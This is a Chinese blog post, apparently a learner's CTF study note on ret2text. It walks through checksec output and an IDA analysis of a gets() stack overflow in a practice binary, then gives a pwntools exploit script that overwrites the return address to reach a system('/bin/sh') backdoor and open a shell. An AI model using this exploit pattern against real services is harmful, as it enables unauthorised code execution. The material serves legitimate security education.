pwn自学笔记(1)--——ret2text

于 2024-10-05 18:28:51 发布
阅读量487 收藏 6
点赞数 10
分类专栏: pwm学习笔记 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CDU__mint__/article/details/142716028
版权

此篇文章是对ret2text的学习初步总结。

目标利用栈溢出执行危险程序获取shell

解体思路:

一、checksec查看二进制文件属性

打开linux终端

  • Arch: 64位小端序架构(amd64)即后续使用IDA64进行反汇编
  • RELRO: 部分 RELRO(Relocation Read-Only),这意味着某些部分的内存是只读的,但并非所有部分都是如此。这通常意味着GOT表(Global Offset Table)是可写的,可能存在GOT覆写攻击的风险
  • Stack: 没有栈保护(No canary found),这意味着栈上没有使用canary来防止缓冲区溢出攻击。这是一个安全风险点。(攻击关键点,可以通过栈溢出控制返回)
  • NX: NX启用(Non-Executable Stack),这意味着栈上的数据不可执行,有助于防止ROP(Return Oriented Programming)攻击。
  • PIE: 没有启用PIE(Position Independent Executable),这意味着程序加载时的基地址是固定的(0x400000),而不是随机的。这使得一些基于地址随机化的防护机制失效,可能会增加漏洞利用的成功率。

二、将文件拖入IDA分析

F5查看底代码寻找溢出漏洞

发现gets()危险,函数char s[128]; 定义了一个大小为128字节的字符数组 s,在这个上下文环境中'char s[128]被分配在了栈上并且占据了连续的一块内存区域

1. gets() 函数的缺陷

gets() 函数从标准输入读取一行字符串,并将其存储在指定的缓冲区中。然而,gets() 函数有一个致命的缺陷:它不会检查输入的字符串长度是否超过了目标缓冲区的大小。这意味着如果用户输入的字符串长度超过128字节(即数组 s 的大小),gets() 会继续将数据写入缓冲区之外的内存区域,从而导致缓冲区溢出(Buffer Overflow)。

2. 缓冲区溢出的危害

缓冲区溢出是一种常见的安全漏洞,可能导致以下几种严重后果:

  • 程序崩溃:当写入的数据覆盖了栈帧中的其他重要数据时,可能会导致程序异常终止或崩溃。
  • 任意代码执行攻击者可以精心构造输入数据,使得溢出的数据恰好覆盖返回地址或其他控制流相关的信息,从而劫持程序的执行流程,执行任意恶意代码。这种攻击方式被称为“栈溢出攻击”或“ROP(Return-Oriented Programming)攻击”。
  • 信息泄露:溢出的数据可能覆盖敏感信息(如密码、密钥等),导致这些信息被泄露给攻击者。

发现可利用后门函数,接下来找出该函数地址

打开IDA View-A右键开启文本模式

找到返回后门函数地址为40063B(/bin/sh)且下方有call _system

三、集齐攻击所需要素开始编写exp进行本地攻击和

编写exp时注意返回地址为16进制在IDA中找到的函数地址为二进制,故写exp时需在前面加上0x

from pwn import *

# 启动进程并获取控制权
io = process('./baby_ret2')

# 定义 system() 函数的地址(假设已知)
system_addr = 0x40063B

# 构造 payload,用于触发缓冲区溢出漏洞
payload = b'a' * 128 + b'b' * 8 + p64(system_addr)

# 发送 payload 到目标进程
io.sendline(payload)

# 进入交互模式以便观察结果或进一步操作
io.interactive()

  • b'a' * 128: 这部分生成了一个由128个字节 'a' 组成的字符串。这些字节将填充到目标缓冲区 s 中,确保填满整个缓冲区。由于 s 的大小是128字节,因此这部分数据正好覆盖了整个缓冲区。

  • b'b' * 8: 这部分生成了一个由8个字节 'b' 组成的字符串。这些字节将覆盖缓冲区 s 之后的内存区域。具体来说,它们会覆盖栈帧中的某些重要数据结构,例如返回地址或保存的基址指针(rbp)等。通过精心控制这8个字节的值,攻击者可以操纵程序的执行流程。

  • p64(system_addr): 这部分将系统调用函数 system() 的地址转换为64位二进制格式,并将其附加到 payload 的末尾。这个地址将被写入到栈帧中被覆盖的部分(通常是返回地址的位置),从而在函数返回时跳转到 system() 函数执行恶意代码。这里的 p64() 是一个常用的工具函数,用于将整数转换为64位的二进制表示形式

写好exp后打开终端运行输入:python3 exp.py(使用python3运行exp)

本地已打通后使用ls可看到文件名(baby-ret2)获取到shell,开始打远程打开靶机

修改exp将process改为remote并将括号内的内容改为端口号加ip

改好后打开终端ctrl+c打断上一步进程再次运行exp,cat flag即可获得flag

mint_.
关注
专栏目录
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1170
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6564
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
2024年网络安全最全pwn学习笔记 BUU,2024年最新百度、华为、京东、B站最新面试题汇集
2401_84300255的博客
05-06 629
next(lib.search(‘/bin/sh’)) #寻找/bin/sh的offsetROPgadget --binary 文件名 --only “pop|ret”#寻找gadgetstrings 文件名|grep sh#寻找字符当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r91.14ldd 文件名#查询绝对路径p32()#转字节型数据u32()#转数字hex()#转十六进制数据1.17这三天主要还是看视频和做题,一点点稳步推进吧。
2024年最新pwn入门-buu第二页题解(32道)(持续更新中)(2),设计思想与代码质量优化+程序性能优化+开发效率优化
2401_84254011的博客
05-06 884
在main函数里面发现gitf和vuln函数,先点进gift函数看看,发现有print(format),格式化字符串漏洞啊.那么有什么用呢?别急接着往下看看到vuln函数可以栈溢出,哎,但是这个v2 = __readfsqword(0x28u)是什么意思呢?
适合自学的网络安全基础技能“蓝宝书”:《CTF那些事儿》_高中生ctf入门书
weixin_42340783的博客
04-28 1698
本书由顶级CTF战队Lancet的指导教师李舟军教授和核心团队成员历时4年打磨而成,创新性地提出了新的CTF知识学习框架,体现了李舟军教授多年的教学精髓和带队经验。书中涵盖PWN、逆向、Web等常见题目,并系统性总结了CTF比赛中工控安全的考察方式。不仅讲授基础知识和操作技能,还探讨CTF赛题的本质,着重阐述了面对不同类型题目时的分析思路和方法。同时,书中针对CTF比赛学习的编排方式,符合我国主流的计算机学科知识体系结构,李舟军教授结合学生的实战经验,为网络安全空间爱好者提供了一本教科书式的实践指导手册。
pwn学习笔记 BUU(1)
qd520_1314的博客
04-12 785
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
pwn学习笔记 BUU
qd520_1314的博客
04-12 403
1.13昨天把Ubuntu18基本配好了,环境配置告一段落,继续学习入门视频,并复现一下上面的题目。lib.symbols[‘system’] #寻找system的offsetnext(lib.search(‘/bin/sh’)) #寻找/bin/sh的offsetROPgadget --binary 文件名 --only “pop|ret”#寻找gadgetstrings 文件名|grep sh#寻找字符。
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 852
CTF-wiki的注解:ret2shellcode
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3586
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8301
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 628
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 466
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
数据结构-哈西表笔记
最新发布
2302_80490510的博客
10-05 177
如果不用去重就可以用哈希表。
江科大笔记—LED闪烁& LED流水灯& 蜂鸣器
m0_62005595的博客
09-28 490
LED闪烁& LED流水灯& 蜂鸣器
OpenGL笔记十九之相机系统
小勇博客
10-02 456
— 2024-10-02 晚上。
【数学分析笔记】第4章第4节 复合函数求导法则及其应用(2)
随手写写
10-05 576
【例4.4.3】ye1cosx​,求y′【解】y′e1cosx​⋅21cosx​1​⋅−sinx−21cosx​sinx​e1cosx​yfxuxvx两边取对数得lnylnfxvxlnux等式两边同时对x求导得y1​y′uxvx1​y′v′xlnuxuxvx​u′xy′xuxvxv′xln。
Coursera_ Algorithms I 学习笔记:Module_3_Analysis_of_Algorithm_Introduction
approximately_的博客
09-29 1186
Coursera_ Algorithms I 学习笔记:Module_3_Analysis_of_Algorithm_Introduction
项目-坦克大战学习笔记-控制玩家坦克不超出地图范围
2401_84659046的博客
10-02 566
由于坦克自身有占用像素格,而坦克生成位置是以左上角x,y的点开始生成,所有坦克向下和向右的实际碰撞位置应该是坦克生成位置加上坦自身宽或高,而坦克有四个方向就有4种对象碰撞可能,所以我们在物体对象的父类中声明存储物体宽和高的int类型。if (Fangxiang == fangxiang.Up)//检测坦克目前朝向。//设置父类继承过来的图片对象高。//设置父类继承过来的图片对象宽。}//放置图片对象的高。}//重写方向构造函数,调用传入的方向信息设置图片的宽高信息。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值